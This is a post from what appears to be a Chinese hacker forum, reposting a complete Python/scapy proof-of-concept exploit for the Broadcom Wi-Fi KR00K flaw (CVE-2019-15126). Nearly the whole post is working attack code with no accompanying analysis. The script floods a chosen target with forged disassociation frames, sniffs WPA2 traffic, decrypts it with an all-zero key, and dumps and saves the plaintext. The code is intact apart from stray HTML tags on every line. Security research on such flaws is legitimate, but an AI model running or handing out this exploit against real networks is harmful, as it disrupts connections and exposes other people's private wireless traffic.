• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Broadcom Wi-Fi设备-(KR00K)信息泄露漏洞


This Wind

Recommended Posts

发布内容作者:Maurizio S                                             漏洞危害等级:critlow_2.gif〔中等〕

CVE编号:CVE-2019-15126

 

# Kr00ker<font></font>
#<font></font>
# Experimetal KR00K PoC in python3 using scapy<font></font>
#<font></font>
# Description:<font></font>
# This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126), <font></font>
# that allows to decrypt some WPA2 CCMP data in vulnerable devices.<font></font>
# More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP packets knowning:<font></font>
# * the TK (128 bites all zero) <font></font>
# * the Nonce (sent plaintext in packet header)<font></font>
# * the Encrypted Data<font></font>
#<font></font>
# Where:<font></font>
# * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR Encrypted Data = Decrypted Data  <font></font>
# * Decrypted stream starts with "\xaa\xaa\x03\x00\x00\x00"<font></font>
# * Nonce (104 bits) = Priority (1byte) + SRC MAC (6bytes) + PN (6bytes)<font></font>
#<font></font>
# This PoC works on WPA2 AES CCMP with Frequency 2.4GHz WLANs.<font></font>
#<font></font>
# References:<font></font>
# https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf<font></font>
#<font></font>
#<font></font>
# Copyright (C) 2020   Maurizio Siddu<font></font>
#<font></font>
#<font></font>
# This program is free software: you can redistribute it and/or modify<font></font>
# it under the terms of the GNU General Public License as published by<font></font>
# the Free Software Foundation, either version 3 of the License, or<font></font>
# (at your option) any later version.<font></font>
#<font></font>
# This program is distributed in the hope that it will be useful,<font></font>
# but WITHOUT ANY WARRANTY; without even the implied warranty of<font></font>
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<font></font>
# GNU General Public License for more details.<font></font>
#<font></font>
# You should have received a copy of the GNU General Public License<font></font>
# along with this program.  If not, see <http://www.gnu.org/licenses/><font></font>
<font></font>
<font></font>
<font></font>
<font></font>
<font></font>
import argparse, threading <font></font>
import datetime, sys, re<font></font>
from scapy.all import *<font></font>
from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth<font></font>
from Cryptodome.Cipher import AES<font></font>
<font></font>
<font></font>
<font></font>
# Proof of Sympathy ;-)<font></font>
LOGO = """\<font></font>
 __ _  ____   __    __  __ _  ____  ____ <font></font>
(  / )(  _ \ /  \  /  \(  / )(  __)(  _ \\<font></font>
 )  (  )   /(  0 )(  0 ))  (  ) _)  )   /<font></font>
(__\_)(__\_) \__/  \__/(__\_)(____)(__\_)<font></font>
"""<font></font>
<font></font>
<font></font>
KR00K_PATTERN = b'\xaa\xaa\x03\x00\x00\x00'<font></font>
<font></font>
<font></font>
class Krooker:<font></font>
    # Define Krooker class<font></font>
    def __init__(self, interface, target_mac, other_mac, reason, num, delay):<font></font>
        self.interface = interface<font></font>
        self.target_mac = target_mac<font></font>
        self.other_mac = other_mac<font></font>
        self.reason = reason<font></font>
        self.num = num<font></font>
        self.delay = delay<font></font>
<font></font>
<font></font>
    def wpa2_decrypt(self, enc_pkt):<font></font>
        # Try to decrypt the data contained in the sniffed packet<font></font>
        t_key = bytes.fromhex("00000000000000000000000000000000")<font></font>
        # This check is redundant<font></font>
        if not enc_pkt.haslayer(Dot11CCMP):<font></font>
            return None<font></font>
        dot11 = enc_pkt[Dot11]<font></font>
        dot11ccmp = enc_pkt[Dot11CCMP]<font></font>
        <font></font>
        # Extract the Packet Number (IV)<font></font>
        PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(dot11ccmp.PN5,dot11ccmp.PN4,dot11ccmp.PN3,dot11ccmp.PN2,dot11ccmp.PN1,dot11ccmp.PN0)<font></font>
        # Extract the victim MAC address<font></font>
        source_addr = re.sub(':','',dot11.addr2)<font></font>
        # Extract the QoS tid<font></font>
        if enc_pkt.haslayer(Dot11QoS):<font></font>
            tid = "{:01x}".format(enc_pkt[Dot11QoS].TID)<font></font>
        else:<font></font>
            tid = '0'<font></font>
        priority = tid + '0'<font></font>
        # Build the nonce<font></font>
        ccmp_nonce = bytes.fromhex(priority) + bytes.fromhex(source_addr) + bytes.fromhex(PN)<font></font>
<font></font>
        # Finally try to decrypt wpa2 data <font></font>
        enc_cipher = AES.new(t_key, AES.MODE_CCM, ccmp_nonce, mac_len=8)<font></font>
        decrypted_data = enc_cipher.decrypt(dot11ccmp.data[:-8])<font></font>
        return decrypted_data<font></font>
<font></font>
<font></font>
<font></font>
    def disassociate(self):<font></font>
        # Forge the dot11 disassociation packet<font></font>
        dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)<font></font>
        # Loop to send the disassociation packets to the victim device<font></font>
        while True:<font></font>
            # Repeat every delay value seconds<font></font>
            time.sleep(self.delay)<font></font>
            print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)<font></font>
            sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)<font></font>
<font></font>
<font></font>
<font></font>
    def check_packet(self, sniffed_pkt):<font></font>
        # Filter for WPA2 AES CCMP packets containing data to decrypt<font></font>
        if sniffed_pkt[Dot11].type == 2 and sniffed_pkt.haslayer(Dot11CCMP):<font></font>
            #print("["+str(datetime.now().time())+"][DEBUG] packet tipe:"+str(sniffed_pkt[Dot11].type)+" sub:"+str(sniffed_pkt[Dot11].subtype))<font></font>
            # Decrypt the packets using the all zero temporary key<font></font>
            dec_data = self.wpa2_decrypt(sniffed_pkt)<font></font>
            # Check if the target is vulnerable<font></font>
            if dec_data and dec_data[0:len(KR00K_PATTERN)] == KR00K_PATTERN:<font></font>
                print("["+str(datetime.now().time())+"][+] Target "+self.target_mac+" is vulnerable to Kr00k, decrypted "+str(len(dec_data))+" bytes")<font></font>
                hexdump(dec_data)<font></font>
                # Save the encrypted and decrypted packets<font></font>
                print("["+str(datetime.now().time())+"][+] Saving encrypted and decrypted 'pcap' files in current folder")<font></font>
                dec_pkt = bytes.fromhex(re.sub(':','',self.target_mac) + re.sub(':','',self.other_mac)) + dec_data[6:]<font></font>
                wrpcap("enc_pkts.pcap", sniffed_pkt, append=True)<font></font>
                wrpcap("dec_pkts.pcap", dec_pkt, append=True)<font></font>
                # Uncomment this if you need a one-shoot PoC decryption <font></font>
                #sys.exit(0)<font></font>
            #else:<font></font>
                #print("["+str(datetime.now().time())+"][DEBUG] This data decryption with all zero TK went wrong")<font></font>
                #pass<font></font>
<font></font>
<font></font>
<font></font>
    def run_disassociation(self):<font></font>
        # Run disassociate function in a background thread<font></font>
        try:<font></font>
            self.disassociate()<font></font>
        except KeyboardInterrupt:<font></font>
            print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")<font></font>
            return<font></font>
<font></font>
<font></font>
<font></font>
<font></font>
<font></font>
def main():<font></font>
    # Passing arguments<font></font>
    parser = argparse.ArgumentParser(prog="kr00ker.py", usage="%(prog)s -i <interface-name> -s <SSID> -c <MAC-client> -n <num-packets> -r <reason-id> -t <target-id> -w <wifi-channel> -d <delay>")<font></font>
    parser.add_argument("-i", "--interface", required=True, help="The Interface name that you want to send packets out of, it must be set in monitor mode", type=str)<font></font>
    parser.add_argument("-b", "--bssid", required=True, help="The MAC address of the Access Point to test", type=str)<font></font>
    parser.add_argument("-c", "--client", required=True, help="The MAC address of the Client Device to test", type=str)<font></font>
    parser.add_argument("-n", "--number", required=False, help="The Number of disassociation packets you want to send", type=int, default=1)<font></font>
    parser.add_argument("-r", "--reason", required=False, help="The Reason identifier of disassociation packets you want to send, accepted values from 1 to 99", type=int, default=0)<font></font>
    parser.add_argument("-t", "--target", required=False, help="The Target identifier", choices=["ap", "client"], type=str, default="ap")<font></font>
    parser.add_argument("-w", "--wifi_channel", required=False, help="The WiFi channel identifier", type=int, default="1")<font></font>
    parser.add_argument("-d", "--delay", required=False, help="The delay for disassociation frames", type=int, default="4")<font></font>
    args = parser.parse_args()<font></font>
    <font></font>
    # Print the kr00ker logo<font></font>
    print(LOGO)<font></font>
<font></font>
    # Start the fun!!<font></font>
    try:<font></font>
        interface = args.interface<font></font>
        ap_mac = args.bssid.lower()<font></font>
        client_mac = args.client.lower()<font></font>
        reason = args.reason<font></font>
        target_channel = args.wifi_channel<font></font>
        n_pkts = args.number<font></font>
        delay = args.delay<font></font>
<font></font>
        # Set the selected channel<font></font>
        if target_channel in range(1, 14):<font></font>
            os.system("iwconfig " + interface + " channel " + str(target_channel))<font></font>
        else:<font></font>
            print("["+str(datetime.now().time())+"][-] Exiting, the specified channel "+target_channel+" is not valid")<font></font>
            exit(1)<font></font>
    <font></font>
        # Check if valid device MAC Addresses have been specified<font></font>
        if client_mac == "ff:ff:ff:ff:ff:ff" or ap_mac == "ff:ff:ff:ff:ff:ff":<font></font>
            print("["+str(datetime.now().time())+"][-] Exiting, the specified FF:FF:FF:FF:FF:FF broadcast MAC address is not valid")<font></font>
            exit(1)<font></font>
    <font></font>
        # Check if a valid reason have been specified<font></font>
        if reason not in range(1,99):<font></font>
            print("Exiting, specified a not valid disassociation Reason ID: "+str(reason))<font></font>
            exit(1)<font></font>
<font></font>
        # Set the MAC address of the target<font></font>
        if args.target == "client":<font></font>
            target_mac = client_mac<font></font>
            other_mac = ap_mac<font></font>
            print("["+str(datetime.now().time())+"][+] The Client device "+target_mac+" will be the target")<font></font>
        else:<font></font>
            target_mac = ap_mac<font></font>
            other_mac = client_mac<font></font>
            print("["+str(datetime.now().time())+"][+] The AP "+target_mac+" will be the target")<font></font>
<font></font>
        # Krooker instance initialization<font></font>
        krooker = Krooker(interface, target_mac, other_mac, reason, n_pkts, delay)<font></font>
<font></font>
        # Start a background thread to send disassociation packets<font></font>
        k_th = threading.Thread(target=krooker.run_disassociation)<font></font>
        k_th.daemon = True    # This does not seem to be useful<font></font>
        k_th.start()<font></font>
<font></font>
        # Start packet interception<font></font>
        s_filter = "ether src "+str(target_mac)+" and ether dst "+str(other_mac)+" and type Data"<font></font>
        sniff(iface=krooker.interface, filter=s_filter, prn=krooker.check_packet)    <font></font>
<font></font>
    except KeyboardInterrupt:<font></font>
        print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")<font></font>
        k_th.join()<font></font>
        sys.exit(0)<font></font>
    <font></font>
    except scapy.error.Scapy_Exception:<font></font>
        print("["+str(datetime.now().time())+"][!] Exiting, your wireless interface seems not in monitor mode")<font></font>
        sys.exit(1)<font></font>
        <font></font>
<font></font>
<font></font>
if __name__ == "__main__":<font></font>
    main()<font></font>
<font></font>
#  [2020-03-20]  #

 

Link to comment
Share on other sites

  • 7 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now